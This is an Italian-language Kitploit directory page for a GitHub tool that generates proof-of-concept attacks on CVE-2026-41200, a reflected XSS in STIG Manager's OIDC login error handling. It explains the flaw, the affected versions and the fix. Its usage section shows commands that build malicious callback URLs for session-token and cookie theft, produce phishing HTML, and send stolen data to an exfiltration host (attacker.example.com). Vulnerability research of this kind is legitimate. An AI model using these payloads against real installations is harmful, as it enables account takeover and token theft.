Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2026-41200-stig-manager-oidc-reflected-xss — Generatore di proof-of-concept per lo sfruttamento di XSS riflessa nell'autenticazione OIDC di STIG Manager, che consente il furto di token di sessione tramite URL di callback appositamente costruiti e output HTML di phishing. | Kitploit
Strumenti/GitHubGitHub/hunt-benito/cve-2026-41200-stig-manager-oidc-reflected-xss
Strumenti di PhishingAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubhunt-benito/cve-2026-41200-stig-manager-oidc-reflected-xss

cve-2026-41200-stig-manager-oidc-reflected-xss

Generatore di proof-of-concept per lo sfruttamento di XSS riflessa nell'autenticazione OIDC di STIG Manager, che consente il furto di token di sessione tramite URL di callback appositamente costruiti e output HTML di phishing.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
42 mesi faNon ancora revisionato

CVE-2026-41200 — PoC di XSS Riflesso OIDC in STIG Manager

Proof of Concept concettuale per la vulnerabilità di Cross-Site Scripting (XSS) riflesso in STIG Manager versioni 1.5.10 fino a 1.6.7.

Riepilogo della Vulnerabilità

Una vulnerabilità di XSS riflesso esiste nel codice di gestione degli errori di autenticazione OIDC dell'applicazione web STIG Manager. I parametri query error e error_description restituiti dal provider OIDC vengono scritti direttamente nel DOM tramite innerHTML senza escapamento HTML. Un attaccante che può creare un URL malevolo e convincere un utente a seguirla può eseguire JavaScript arbitrario nel contesto dell'applicazione.

La vulnerabilità è più grave quando l'utente preso di mira ha una sessione STIG Manager attiva in un'altra scheda del browser — il codice iniettato può comunicare con lo SharedWorker che gestisce il token di accesso, abilitando richieste API autenticate per conto della vittima.

  • CVE: CVE-2026-41200
  • CVSS 4.0: 8.5 (ALTA)
  • Affette: NUWCDIVNPT/stig-manager >= 1.5.10, < 1.6.8
  • Corretta: v1.6.8
  • Avviso: GHSA-wg33-j3rv-jq72
  • Articolo: hunt-benito.com

Utilizzo

root@kitploit:~
# Generate a malicious callback URL (SharedWorker token theft mode)
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m sharedworker

# Generate a simple cookie theft payload
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m simple

# Output as phishing HTML
python3 cve-2026-41200-poc.py --format html

# Custom API and exfil hosts
python3 cve-2026-41200-poc.py \
  -c https://stig-manager.example.com/auth/callback \
  -a https://stig-manager.example.com \
  -e https://attacker.example.com

Avvertenze

Questo strumento è fornito solo per scopi educativi e ricerca sulla sicurezza autorizzata.

  • Usalo solo contro installazioni di tua proprietà o per le quali hai esplicita autorizzazione al test.
  • L'accesso non autorizzato a sistemi informatici è illegale nella maggior parte delle giurisdizioni.
  • Gli autori non si assumono alcuna responsabilità per l'uso improprio di questo strumento.
Scarica lo strumento